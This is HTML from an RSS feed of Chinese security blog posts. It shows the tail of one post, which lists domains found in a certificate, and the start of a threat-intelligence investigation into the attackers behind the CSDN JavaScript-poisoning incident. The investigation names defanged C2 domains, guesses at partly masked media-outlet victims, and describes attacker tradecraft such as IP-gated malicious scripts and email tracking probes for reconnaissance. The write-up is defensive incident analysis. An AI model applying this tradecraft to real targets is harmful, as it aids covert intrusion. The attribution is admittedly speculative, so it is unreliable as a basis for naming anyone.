3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">www.jiXXXXnhui.vip</span></code><span leaf=""> ，证书报错可以关联出大量的域名，似乎是还没投入使用的域名？</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">各个网站通过证书证明自己的身份。Firefox 不能信任此网站，它使用的证书对 www.jiXXXXnhui.vip 无效。该证书只适用于下列名称： 10086.smrk36.cc, 52bobo.cc, 5bgddg.top, 5g.hetang123.com, 5g.mysadfun.com, 5qwmba.top, 663danm.top, 665edwm.top, 665sfnm.top, 665tvam.top, 666wkrm.top, 667kfmm.top, 667qfkm.top, 6adgcz.top, 6dtkmk.top, 6edstd.top, 6ffmee.top, 6gudwv.top, 6ppqff.top, 6qcnzq.top, 6scefu.top, 75ams.top, 78amp.top, 78amw.top, 78anc.top, 78m609.top, 7aybqz.top, 7azqqq.top, 7cgikn.top, 7cseya.top, 7dtcxx.top, 7fqrto.top, 7hqrfi.top, 7ivkhc.top, 7mqrrp.top, 7naapf.top, 7nfuus.top, 7nkstv.top, 7pldok.top, 7pyggt.top, 7tdraf.top, 7tyvmx.top, 7vbpcf.top, 7vzerv.top, 7wfthl.top, 7wockk.top, 7xecqk.top, 7xfvld.top, 7znaiu.top, 8622qc.top, 8gauv.top, 8uacx.top, 8x8x8x37.xyz, 91bs.xyz, 91hotzhan.cc, bdyar.xyz, bisege.vip, cyweng.cc, d78x.cc, fsx641.eqqmy3738.com, hornygaytube.com, jjd20.com, kougongzouqi.xyz, m.baimashuwu.com, mjxc57.com, tellmeurl.com, v18136.top, www.2-c1ass.com, www.abidd.xyz, www.bmm04.com, www.bwllh.xyz, www.caowoidn88.cn, www.cllzy01.xyz, www.cnyidaiyilu.com, www.cssw2.xyz, www.cyys01.xyz, www.d78x.cc, www.daohang360.xyz, www.fmml01.xyz, www.gvfuck.xyz, www.hetang123.com, www.hssg01.xyz, www.hssy01.xyz, www.huangyyl.xyz, www.kp51q.top, www.kp52l.top, www.laap01.xyz, www.sddtz7.cc, www.shichedh.cc, www.upaytr.com, www.xgyw09.xyz, www.yaoyy01.xyz, www.zzmkt.com, xd88yp.com, youjiazz.com</span><span leaf=""><br/></span></code></pre><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">由于 firefox 与 chrome 展示证书报错的信息差异，firefox 会把证书 SAN 列表里的域名全部展示出来。</span></p><p><img data-imgfileid="100001625" class="rich_pages wxw-img" data-ratio="0.6167728237791932" data-s="300,640" data-type="png" data-w="1884" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=96ee2e43&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9XlCCx9LfANu56IpjKJyhvXhp4D7KVkYIGfUzZlohicjmibX58hniaz8NA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">chrome需要在这里查看。</span></p><p><img data-imgfileid="100001626" class="rich_pages wxw-img" data-ratio="0.5679012345679012" data-s="300,640" data-type="png" data-w="2430" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=817ccc83&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9anLichLpbmETAicUpaaKg17DNAooTiaatGricm89SOy9cNuqUla9A9qELQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><hr style="margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;border-top-style: solid;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 1px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;background-attachment: scroll;background-clip: border-box;background-color: rgba(0, 0, 0, 0);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: 1px;"/><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">第二部分先发到这里，未完待续。</span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247485280">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=7596eadd&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU1NDYxMTE5OA%3D%3D%26mid%3D2247485280%26idx%3D1%26sn%3D64c67121ee64224b6e620cde2e771ef3%26chksm%3Dfbe1bff1cc9636e78e6629d3a429d9a436ed70b5a90b5f22278cbc853ffad00913682a4a60e3%26scene%3D58%26subscene%3D0%23rd">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 24 Jan 2025 07:05:00 +0800</pubDate>
    </item>
    <item>
      <title>CSDN投毒是谁干的（一）</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU1NDYxMTE5OA==&amp;mid=2247485072&amp;idx=1&amp;sn=3f04adc75eb3853e22365de048190c90</link>
      <description>是谁呢？</description>
      <content:encoded><![CDATA[<p>
原创 <span>热心网友</span> <span>2025-01-23 07:00</span> <span style="display: inline-block;">泰国</span>
</p>

<p>是谁呢？</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=e325f59b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8UVTHamvQHhMH3obHiagNKKg9LQ3jjVmqqdnXibJXLgCEysZos2GRVf4A%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">12月12号一哥报道了 CSDN 挂马攻击事件，引起了我强烈的兴趣。当时花了大概两周时间把素人能接触到的信息整理了七七八八，折腾出来一个 3 万多字快 500 张图的文档，信息量有点大导致身边朋友没几个人有耐心看完。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">另外当时感觉自己基本已经把这个事分析完了，信息搜集的算是已经比较全面，后来也是实在分析累了就没再跟进了。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">但是比较巧合的是前几天这个事竟然又出现了两次转折，导致我意外发现这个团队在 QAX 发文之后还一直处于活跃状态。基于 “<span textstyle="" style="font-weight: bold;">有的受害者一直不知道自己已经中招了并且还在被持续内网横向</span>” 的情况，我决定在过年之前把追踪分析的结果总结拆分成几部分发一下。</span></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 22px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">建议</span></span><span style="display: none;"></span></h2><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">如果你是媒体相关单位的网络安全岗位，非常建议你拉到文末的 IOC 部分回溯排查一下自家内网，这可能涉及到安稳过个好年🤣。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">如果你是互联网大厂的安全运营相关岗位，也可以顺手一搜，后来的分析发现攻击者的目标清单里包含少部分互联网目标。</span></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 22px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">TL;DR</span></span><span style="display: none;"></span></h2><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">基于网络 ioc、二进制样本以及其他威胁情报，对 CSDN 投毒事件操作者的追踪尝试，最终得出的结论比较倾向于以下标签。</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLVqWiaaeT9kOQEt2bfEia4W7EoRzXmp7eqgMuAhxs2rWvP3tTPOtKEWS2EDsutXDwiabibvp9ugMDUyr/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">SEO</span><span leaf=""><br/></span><span leaf="">新闻源</span><span leaf=""><br/></span><span leaf="">菠菜盘</span><span leaf=""><br/></span><span leaf="">强渗透能力</span><span leaf=""><br/></span><span leaf="">高</span><span style="color: #98c379;line-height: 26px;"><span leaf="">&#34;研发&#34;</span></span><span leaf="">投入</span><span leaf=""><br/></span><span leaf="">买站投毒</span><span leaf=""><br/></span><span leaf="">目标人群站长</span><span leaf=""><br/></span><span leaf="">国人</span><span leaf=""><br/></span><span leaf="">泰国</span><span leaf=""><br/></span><span leaf="">历史攻击事件关联</span><span leaf=""><br/></span></code></pre><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 22px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">提前声明</span></span><span style="display: none;"></span></h2><ol style="list-style-type: decimal;margin-top: 8px;margin-bottom: 8px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 25px;padding-right: 0px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><p style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">我只是一个菜鸡，不擅长威胁分析，更代表不了权威，本文仅作为分析过程的记录和阐述，一切都是个人的看法和结论。</span></p></li><li><p style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">文章基本完成于1月1号左右，这个团队持续在活动中应该会产生新的样本，所以文中的 ioc 关联现在看来不一定全。</span></p></li><li><p style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">文章里如果有逻辑不合理的地方欢迎指出，其他的问题就不回复了。</span></p></li><li><p style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">攻击者看到文章请不要恨我，个人觉得这次行动还是比较秀的。但是首先，操作太A里A气的话，盯上你们的肯定不止我一个。</span></p><p style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">其次攻防本来就是一个对抗的过程，对抗都是相互的、你来我往的，相信你们也能理解。我写文章无任何利益、竞争目的，单纯觉得有趣。</span></p></li></ol><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 22px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">前置信息</span></span><span style="display: none;"></span></h2><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 20px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">奇安信披露攻击事件</span></span><span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">2024年12月12日 14:08 奇安信发布文章《国内最大IT社区CSDN被挂马，CDN可能是罪魁祸首？》披露了一则针对 CSDN 基于篡改 js 的定向投毒攻击事件，攻击者通过第一阶段的 js 限定了一个IP清单，只有命中的 IP 地址才会触发第二阶段加载仿冒的钓鱼页面的 js。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">奇安信文章中表示对 js 内置的 IP 列表进行了分析后，结论是攻击者似乎比较关注媒体行业。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">文章中分析到，托管第一阶段恶意 js 的恶意域名 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">analyzev.oss-cn-beijing.aliyuncs.com-cn-beijing.aliyuncs[.]com</span></code><span leaf=""> 的访问量在 9 月初陡增，一直持续到 9 月底，后来 10 月底再次爆发。</span></p><p><img data-imgfileid="100001308" class="rich_pages wxw-img" data-ratio="0.4703703703703704" data-s="300,640" data-type="webp" data-w="1080" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=f9b09b0a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8YGuXYRd2C9dqp5BE7XGbrjk6yrztfI4yyRAXjkamA1CUkxgg7hRk1w%2F640%3Fwx_fmt%3Dwebp%26from%3Dappmsg"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 20px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">投毒受害者简要确认</span></span><span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">最开始文章刚刚发布的时候攻击者的部分基础设施还没来得及关闭，通过在 jquery-statistics.js 当中拿到的 IP 地址清单和访问最终 C2域名 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">server.centos[.]ws</span></code><span leaf=""> 的来源数据对比，发现攻击者这一波操作应该确实是拿到了部分想要的权限。</span></p><p><img data-imgfileid="100001310" class="rich_pages wxw-img" data-ratio="0.26458333333333334" data-s="300,640" data-type="png" data-w="1920" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=cd38d096&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8PSrYdYDkKbrZrSWeF0FjPa37pjIWz6vJZTzV8M6Jxs1VmL1QFyc5xA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001309" class="rich_pages wxw-img" data-ratio="0.1592505854800937" data-s="300,640" data-type="png" data-w="1708" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=1399b144&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8ib1Ijkqh3gslOwvMMj3CmeAJvzLkmfv9uRl91OOicsNc8DE5KHDISPug%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">尝试对几个受害者的身份归属进行确认分析。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">根据该IP开放的F5服务的签名信息 XXRB 以及地理位置信息来看，xxx.xx.xxx.xx 有可能是XX日报（我知道还能搜到，打码避嫌）。</span></p><p><img data-imgfileid="100001313" class="rich_pages wxw-img" data-ratio="0.5331632653061225" data-s="300,640" data-type="png" data-w="2352" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=e4d60849&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8s596eVGxbiaiaIGQTwcnelnoEqzurDWR6dsk7XY6hhjqvje37rWiau5Ng%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001312" class="rich_pages wxw-img" data-ratio="0.6490280777537797" data-s="300,640" data-type="png" data-w="1852" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=6916fdcd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8wuEr8zP3icT9SCXyQvXCDWEiaVSfJ2EP9biaorBjoWfewyfFx9xZNGPibA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001311" class="rich_pages wxw-img" data-ratio="0.4344512195121951" data-s="300,640" data-type="png" data-w="1312" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=50fc7385&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8hElIsBq8DgAIYmn7IfXVMCWExp2Lia2XIAICCGJWyeYIw4V1j5T4bqA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">剩下的几个中招的地址有的只能模糊的确认，但是的确能看出来攻击者的目标比较倾向于奇安信的结论 —— 新闻行业。</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLVqWiaaeT9kOQEt2bfEia4W7EoRzXmp7eqgMuAhxs2rWvP3tTPOtKEWS2EDsutXDwiabibvp9ugMDUyr/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">XXX.XX.XXX.XX XX日报</span><span leaf=""><br/></span><span leaf="">XXX.XXX.XXX.XX XX天气网</span><span leaf=""><br/></span><span leaf="">XXX.XXX.XX.XX XX日报</span><span leaf=""><br/></span></code></pre><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 20px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">攻击者意图猜测</span></span><span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">但是大家都想不明白为什么要搞媒体行业，媒体行业并不能直接获得收益。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">同时我也比较好奇攻击者从哪里拿到这部分媒体行业的出口 IP。如果是我来做这件事的话我可能会发一封不会让接收者起疑心的邮件，邮件里面带一个探针，如果打开邮件的时候加载了这个请求的话应该就能拿到出口 IP 了。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">但是这么做有一些小问题，就是接收者很有可能不是在公司打开邮件，导致探针获取到的IP可能并不准确。再者就是一个公司不见得只有一个出口 IP，从攻击 CSDN 访问者来猜测如果攻击者的目标是研发、运维这类的距离基础设施权限比较近的人，他们的联系方式在互联网可能并不那么好拿到，所以给互联网上能搜到联系方式的人发的邮件打到的IP地址不见得能覆盖真正的目标人群。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">当然了这些都是 yy，真实的情况只有攻击者和受害者知道了。</span></p><p><img data-imgfileid="100001314" class="rich_pages wxw-img" data-ratio="0.527169505271695" data-s="300,640" data-type="png" data-w="2466" type="block" 